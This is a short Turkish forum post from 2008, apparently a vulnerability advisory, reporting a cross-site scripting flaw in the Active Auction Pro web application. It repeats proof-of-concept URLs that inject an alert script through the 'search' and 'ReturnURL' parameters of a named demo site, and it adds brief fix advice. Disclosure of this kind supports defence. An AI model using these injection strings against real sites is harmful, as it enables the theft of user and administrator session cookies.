Active Auction Pro ~ XSS Vuln.
1 sayfadaki 1 sayfası
Active Auction Pro ~ XSS Vuln.
tarafından Admin C.tesi Ekim 25, 2008 5:18 pm
< ------------------- header data start ------------------- >
#############################################################
# Application Name : Active Auction Pro
# Vulnerable Type : Cross Site Scripting
# Infection : Yönetici ve User cookie’leri çalınabilir.
# Bug Fix Advice : Zararlı karakterler filtrelenmelidir.
# author : Bug Researchers
# Example : http://www.activewebsoftwares.com/demoactiveauction/search.asp?search=">alert("AZ@P")
# Example : http://www.activewebsoftwares.com/demoactiveauction/account.asp?ReturnURL=">alert("AZ@P")
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
/search.asp?search=">alert("AZ@P")
/account.asp?ReturnURL=">alert("AZ@P")
< -- bug code end of -- >
#############################################################
# Application Name : Active Auction Pro
# Vulnerable Type : Cross Site Scripting
# Infection : Yönetici ve User cookie’leri çalınabilir.
# Bug Fix Advice : Zararlı karakterler filtrelenmelidir.
# author : Bug Researchers
# Example : http://www.activewebsoftwares.com/demoactiveauction/search.asp?search=">alert("AZ@P")
# Example : http://www.activewebsoftwares.com/demoactiveauction/account.asp?ReturnURL=">alert("AZ@P")
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
/search.asp?search=">alert("AZ@P")
/account.asp?ReturnURL=">alert("AZ@P")
< -- bug code end of -- >
Admin- Admin
-
Mesaj Sayısı : 134
Metin Alanı : <center><font color="white"><marquee direction="left" style="background:red">Vatanını Seven Görevini En İyi Yapandı
.</marquee></font></center>
Madalyalar :
Kayıt tarihi : 24/10/08
Tecrübe
İtibar:
(100/100) -
1 sayfadaki 1 sayfası
Bu forumun müsaadesi var:
Bu forumdaki mesajlara cevap veremezsiniz